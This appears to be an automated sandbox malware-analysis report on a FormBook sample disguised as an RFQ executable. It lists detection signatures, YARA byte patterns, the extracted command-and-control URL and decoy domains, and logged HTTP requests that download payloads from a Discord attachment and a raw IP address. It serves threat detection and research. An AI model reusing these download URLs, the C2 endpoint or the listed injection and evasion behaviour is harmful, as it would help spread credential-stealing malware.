Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ- 7075-T6.exe

Overview

General Information

Sample Name:RFQ- 7075-T6.exe
Analysis ID:680627
MD5:d9761200032232025041ea4e1f7d0ae2
SHA1:bbebd24b01671f232d6e8552fd0b6ff43f22a2f6
SHA256:d5880984d7995779a57c6d76f84fa336ab7346560689ea406205544fe0f038c1
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • RFQ- 7075-T6.exe (PID: 3388 cmdline: "C:\Users\user\Desktop\RFQ- 7075-T6.exe" MD5: D9761200032232025041EA4E1F7D0AE2)
    • RFQ- 7075-T6.exe (PID: 5432 cmdline: C:\Users\user\Desktop\RFQ- 7075-T6.exe MD5: D9761200032232025041EA4E1F7D0AE2)
      • WerFault.exe (PID: 6012 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 172 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"C2 list": ["www.lafuriaroja.team/jn86/"], "decoy": ["yzeym.top", "bettymassage.co.uk", "zvzac.com", "eventscomparison.xyz", "ybzgh.com", "3618shop.com", "sosoicey.com", "sundancerenewable.com", "whorephotos.com", "zamawiamy.online", "idmtoucan.site", "home-visites.com", "maxtesler.website", "terilio.net", "aaemp.com", "linksy.site", "hairurge.com", "lizzo.ltd", "ukmcqc.co.uk", "coolerzap.net", "minifini.com", "rainjewel.com", "picassoai.art", "qwry.store", "gstwarehousesolutions.com", "fexlueg.xyz", "residentiallaw.uk", "corelinks.app", "suaratkbm.com", "juliettjaya.xyz", "suggestiontherapy.com", "chocolatemacaroon.com", "axionmotion.net", "gurpreet.world", "watersportsale.space", "babyinbalance.com", "alcacersurveyors.com", "jerseycity.construction", "jav-stars.com", "xn--micrsoft-q4a.com", "9966181.xyz", "batesmotel.xyz", "liquidationsteals.com", "guveniliradresim5.site", "onlycars.app", "156293.sbs", "fithealthcode.net", "bin-pro.com", "vacation2me.net", "ofertalbox.com", "tesla3.website", "saradaram.com", "forttownfinancial.net", "aguide2floridakeys.com", "asd461.xyz", "nihan.world", "vife.solutions", "aspotfy.com", "muttleycrue.net", "qvai-p8.xyz", "bestastroraghuram.com", "thefsdcollective.xyz", "flowerstudio.info", "clearwaterbeachdiet.store"]}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Formbook_1112e116unknownunknown
  • 0xafa74:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0xc9e0a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xb4867:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0xc05a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
dump.pcapFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
  • 0xb3563:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xb398e:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xc035f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xbfdb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xc04a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xc061f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xb43ec:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xbef5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb5203:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xc89c1:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xc9b2e:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
dump.pcapFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
  • 0xc553d:$sqlite3step: 68 34 1C 7B E1
  • 0xc5650:$sqlite3step: 68 34 1C 7B E1
  • 0xc556c:$sqlite3text: 68 38 2A 90 C5
  • 0xc5691:$sqlite3text: 68 38 2A 90 C5
  • 0xc557f:$sqlite3blob: 68 53 D8 7F 8C
  • 0xc56a7:$sqlite3blob: 68 53 D8 7F 8C
SourceRuleDescriptionAuthorStrings
00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0xd0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x5dc7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x5bc5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x56b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x5cc7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x5e3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x492c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xbe37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xce3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x8d59:$sqlite3step: 68 34 1C 7B E1
    • 0x8e6c:$sqlite3step: 68 34 1C 7B E1
    • 0x8d88:$sqlite3text: 68 38 2A 90 C5
    • 0x8ead:$sqlite3text: 68 38 2A 90 C5
    • 0x8d9b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x8ec3:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 9 entries
      SourceRuleDescriptionAuthorStrings
      1.0.RFQ- 7075-T6.exe.3c0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.0.RFQ- 7075-T6.exe.3c0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.0.RFQ- 7075-T6.exe.3c0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.0.RFQ- 7075-T6.exe.3c0000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: RFQ- 7075-T6.exeVirustotal: Detection: 21%Perma Link
        Source: RFQ- 7075-T6.exeReversingLabs: Detection: 14%
        Source: Yara matchFile source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: RFQ- 7075-T6.exeAvira: detected
        Source: http://109.206.241.81/htdocs/qWDXb.exeAvira URL Cloud: Label: malware
        Source: http://109.206.241.81/htdocs/qWDXb.exeVirustotal: Detection: 15%Perma Link
        Source: RFQ- 7075-T6.exeJoe Sandbox ML: detected
        Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lafuriaroja.team/jn86/"], "decoy": ["yzeym.top", "bettymassage.co.uk", "zvzac.com", "eventscomparison.xyz", "ybzgh.com", "3618shop.com", "sosoicey.com", "sundancerenewable.com", "whorephotos.com", "zamawiamy.online", "idmtoucan.site", "home-visites.com", "maxtesler.website", "terilio.net", "aaemp.com", "linksy.site", "hairurge.com", "lizzo.ltd", "ukmcqc.co.uk", "coolerzap.net", "minifini.com", "rainjewel.com", "picassoai.art", "qwry.store", "gstwarehousesolutions.com", "fexlueg.xyz", "residentiallaw.uk", "corelinks.app", "suaratkbm.com", "juliettjaya.xyz", "suggestiontherapy.com", "chocolatemacaroon.com", "axionmotion.net", "gurpreet.world", "watersportsale.space", "babyinbalance.com", "alcacersurveyors.com", "jerseycity.construction", "jav-stars.com", "xn--micrsoft-q4a.com", "9966181.xyz", "batesmotel.xyz", "liquidationsteals.com", "guveniliradresim5.site", "onlycars.app", "156293.sbs", "fithealthcode.net", "bin-pro.com", "vacation2me.net", "ofertalbox.com", "tesla3.website", "saradaram.com", "forttownfinancial.net", "aguide2floridakeys.com", "asd461.xyz", "nihan.world", "vife.solutions", "aspotfy.com", "muttleycrue.net", "qvai-p8.xyz", "bestastroraghuram.com", "thefsdcollective.xyz", "flowerstudio.info", "clearwaterbeachdiet.store"]}
        Source: RFQ- 7075-T6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: RFQ- 7075-T6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdb source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: c:\Users\User\AppData\Local\Temp\Microsoft.CodeAnalysis.Hosting.Server.Features.pdb source: RFQ- 7075-T6.exe
        Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdbd source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp

        Networking

        barindex
        Source: Malware configuration extractorURLs: www.lafuriaroja.team/jn86/
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /htdocs/qWDXb.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 109.206.241.81 109.206.241.81
        Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
        Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 20:21:09 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Mon, 08 Aug 2022 17:34:39 GMTETag: "2e400-5e5be3af3ad6a"Accept-Ranges: bytesContent-Length: 189440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ab fc 08 ea ef 9d 66 b9 ef 9d 66 b9 ef 9d 66 b9 f4 00 cd b9 a9 9d 66 b9 f4 00 f8 b9 ec 9d 66 b9 f4 00 fb b9 ee 9d 66 b9 52 69 63 68 ef 9d 66 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 cb 17 11 4a 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d2 02 00 00 00 00 00 00 00 00 00 60 f0 01 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 02 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 d0 02 00 00 10 00 00 00 d2 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
        Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.81/htdocs/qWDXb.exe
        Source: RFQ- 7075-T6.exe, 00000000.00000002.232496959.0000000002637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.814
        Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
        Source: RFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSign
        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /htdocs/qWDXb.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49739 version: TLS 1.2

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: dump.pcap, type: PCAPMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: dump.pcap, type: PCAPMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: RFQ- 7075-T6.exe PID: 3388, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: RFQ- 7075-T6.exe PID: 5432, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: RFQ- 7075-T6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: dump.pcap, type: PCAPMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: dump.pcap, type: PCAPMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
